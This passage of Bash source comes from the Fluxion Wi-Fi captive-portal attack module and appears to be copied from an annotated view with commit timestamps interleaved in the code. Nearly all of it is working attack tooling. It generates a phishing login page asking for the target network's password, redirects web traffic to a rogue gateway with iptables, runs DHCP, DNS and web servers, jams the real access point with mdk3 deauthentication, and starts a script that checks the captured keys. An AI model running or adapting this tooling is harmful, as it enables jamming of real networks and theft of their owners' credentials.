<script src = \" js/jquery.validate.min.js\" ></script>
<script src = \" js/additional-methods.min.js\" ></script>
</head>
<body>
<!-- Main page -->
<div data-role= \" page\" data-theme= \" a\" >
<div class = \" ui-content\" dir = \" $DIALOG_WEB_DIR \" >
<fieldset>
<form id = \" loginForm\" class = \" ui-body ui-body-b ui-corner-all\" action = \" check.php\" method = \" POST\" >
</br>
<div class = \" ui-field-contain ui-responsive\" style = \" text-align:center; \" >
<div><u>$APTargetSSID </u> ( $APTargetMAC ) </div>
<!--<div>Channel: $APTargetChannel </div>-->
</div>
<div style = \" text-align:center; \" >
<br>
<label>$DIALOG_WEB_INFO </label>
<br>
</div>
<div class = \" ui-field-contain\" >
<label for = \" key1\" >$DIALOG_WEB_INPUT </label>
<input id = \" key1\" style = \" color:#333; background-color:#CCC\" data-clear-btn= \" true\" type = \" password\" value = \" \" name = \" key1\" maxlength = \" 64\" />
</div>
<input data-icon= \" check\" data-inline= \" true\" name = \" submitBtn\" type = \" submit\" value = \" $DIALOG_WEB_SUBMIT \" />
</form>
</fieldset>
</div>
</div>
<script src = \" js/main.js\" ></script>
<script>
$.extend( $.validator.messages, {
required: \" $DIALOG_WEB_ERROR_MSG \" ,
maxlength: $.validator.format( \" $DIALOG_WEB_LENGTH_MAX \" ) ,
minlength: $.validator.format( \" $DIALOG_WEB_LENGTH_MIN \" )
} ) ;
</script>
</body>
2017-08-09 18:31:32 -06:00
</html>" > " $FLUXIONWorkspacePath /captive_portal/index.html"
2017-08-08 12:48:00 -06:00
}
2017-08-11 02:29:47 -06:00
function captive_portal_unset_routes( ) {
if [ -f " $FLUXIONWorkspacePath /iptables-rules " ] ; then
iptables-restore < " $FLUXIONWorkspacePath /iptables-rules " & > $FLUXIONOutputDevice
sandbox_remove_workfile " $FLUXIONWorkspacePath /iptables-rules "
else
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
fi
# Restore system's original forwarding state
if [ -f " $FLUXIONWorkspacePath /ip_forward " ] ; then
sysctl -w net.ipv4.ip_forward= $( cat " $FLUXIONWorkspacePath /ip_forward " ) & > $FLUXIONOutputDevice
sandbox_remove_workfile " $FLUXIONWorkspacePath /ip_forward "
fi
}
2017-08-08 12:48:00 -06:00
# Set up DHCP / WEB server
# Set up DHCP / WEB server
function captive_portal_set_routes( ) {
# Give an address to the gateway interface in the network.
ifconfig $VIGW $VIGWAddress netmask 255.255.255.0
# Add a route to the virtual gateway interface.
route add -net $VIGWNetwork .0 netmask 255.255.255.0 gw $VIGWAddress
2017-08-11 02:29:47 -06:00
# Save the system's routing state to restore later.
cp "/proc/sys/net/ipv4/ip_forward" " $FLUXIONWorkspacePath /ip_forward "
2017-08-08 12:48:00 -06:00
# Activate system IPV4 packet routing/forwarding.
sysctl -w net.ipv4.ip_forward= 1 & >$FLUXIONOutputDevice
2017-08-11 02:29:47 -06:00
iptables-save > " $FLUXIONWorkspacePath /iptables-rules "
2017-08-08 12:48:00 -06:00
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $VIGWAddress :80
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $VIGWAddress :443
iptables -A INPUT -p tcp --sport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
iptables -t nat -A POSTROUTING -j MASQUERADE
}
2017-08-30 15:41:09 -06:00
function captive_portal_stop_interface( ) {
captive_portal_unset_routes
2017-09-02 14:48:36 -06:00
if [ " $APRogueService " ] && interface_is_wireless " $WIAccessPoint " ; then
ap_stop
fi
2017-08-30 15:41:09 -06:00
}
function captive_portal_start_interface( ) {
2017-09-02 14:48:36 -06:00
if [ " $APRogueService " ] && interface_is_wireless " $WIAccessPoint " ; then
echo -e " $FLUXIONVLine $CaptivePortalStaringAPServiceNotice "
ap_start
fi
2017-08-30 15:41:09 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStaringAPRoutesNotice "
captive_portal_set_routes &
sleep 3
fuser -n tcp -k 53 67 80 443 & > $FLUXIONOutputDevice
fuser -n udp -k 53 67 80 443 & > $FLUXIONOutputDevice
}
2017-08-08 12:48:00 -06:00
function unprep_attack( ) {
CaptivePortalState = "Not Ready"
captive_portal_unset_attack
captive_portal_unset_site
captive_portal_unset_cert
captive_portal_unset_auth
2017-09-02 13:28:45 -06:00
captive_portal_unset_interface
2017-08-08 12:48:00 -06:00
}
function prep_attack( ) {
while true; do
2017-09-02 13:28:45 -06:00
captive_portal_set_interface; if [ $? -ne 0 ] ; then break; fi
2017-08-08 12:48:00 -06:00
captive_portal_set_auth; if [ $? -ne 0 ] ; then continue ; fi
captive_portal_set_cert; if [ $? -ne 0 ] ; then continue ; fi
captive_portal_set_site; if [ $? -ne 0 ] ; then continue ; fi
captive_portal_set_attack; if [ $? -ne 0 ] ; then continue ; fi
CaptivePortalState = "Ready"
break
done
# Check for prep abortion.
if [ " $CaptivePortalState " = "Not Ready" ] ; then
unprep_attack
return 1;
fi
}
function stop_attack( ) {
# Attempt to find PIDs of any running authenticators.
local authenticatorPID = $( ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}' )
# Signal any authenticator to stop authentication loop.
if [ " $authenticatorPID " ] ; then kill -s SIGABRT $authenticatorPID ; fi
killall mdk3 & > $FLUXIONOutputDevice
local FLUXIONJammer = $( ps a | grep -e "FLUXION AP Jammer" | awk '{print $1' } )
if [ " $FLUXIONJammer " ] ; then
kill $FLUXIONJammer & > $FLUXIONOutputDevice
fi
2017-08-20 20:38:53 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /mdk3_blacklist.lst "
2017-08-08 12:48:00 -06:00
# Kill captive portal web server.
if [ $CaptivePortalServerPID ] ; then
kill $CaptivePortalServerPID & > $FLUXIONOutputDevice
CaptivePortalServerPID = ""
fi
# Kill python DNS service if one is found.
local FLUXIONDNS = $( ps a | grep -e "FLUXION AP DNS" | awk '{print $1' } )
if [ " $FLUXIONDNS " ] ; then
kill $FLUXIONDNS & > $FLUXIONOutputDevice
fi
# Kill DHCP service.
local FLUXIONDHCP = $( ps a | grep -e "FLUXION AP DHCP" | awk '{print $1' } )
if [ " $FLUXIONDHCP " ] ; then
kill $FLUXIONDHCP & > $FLUXIONOutputDevice
fi
2017-08-20 20:38:53 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /clients.txt "
2017-08-08 12:48:00 -06:00
2017-08-30 15:41:09 -06:00
captive_portal_stop_interface
2017-08-08 12:48:00 -06:00
}
function start_attack( ) {
if [ " $CaptivePortalState " = "Running" ] ; then return 0; fi
stop_attack
2017-08-30 15:41:09 -06:00
captive_portal_start_interface
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice "
2017-08-20 13:04:22 -06:00
xterm -bg black -fg green $TOPLEFT -title "FLUXION AP DHCP Service" -e " dhcpd -d -f -lf \" $FLUXIONWorkspacePath /dhcpd.leases\" -cf \" $FLUXIONWorkspacePath /dhcpd.conf\" $VIGW 2>&1 | tee -a \" $FLUXIONWorkspacePath /clients.txt\" " &
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingDNSServiceNotice "
2017-08-20 20:38:53 -06:00
xterm $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "FLUXION AP DNS Service" -e " if type python2 >/dev/null 2>/dev/null; then python2 \" $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py\"; else python \" $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py\"; fi " &
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingWebServiceNotice "
2017-08-09 18:31:32 -06:00
lighttpd -f " $FLUXIONWorkspacePath /lighttpd.conf " & > $FLUXIONOutputDevice
2017-08-08 12:48:00 -06:00
CaptivePortalServerPID = $!
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingJammerServiceNotice "
2017-08-09 22:30:23 -06:00
echo -e " $APTargetMAC " > " $FLUXIONWorkspacePath /mdk3_blacklist.lst "
2017-08-30 15:01:38 -06:00
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title " FLUXION AP Jammer [mdk3] $APTargetSSID " -e " mdk3 $WIMonitor d -c $APTargetChannel -b \" $FLUXIONWorkspacePath /mdk3_blacklist.lst\" " &
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice "
2017-08-18 01:39:52 -06:00
xterm -hold $TOPRIGHT -bg "#000000" -fg "#CCCCCC" -title "FLUXION AP Authenticator" -e " $FLUXIONWorkspacePath /captive_portal_authenticator.sh " &
2017-08-08 12:48:00 -06:00
}
# FLUXSCRIPT END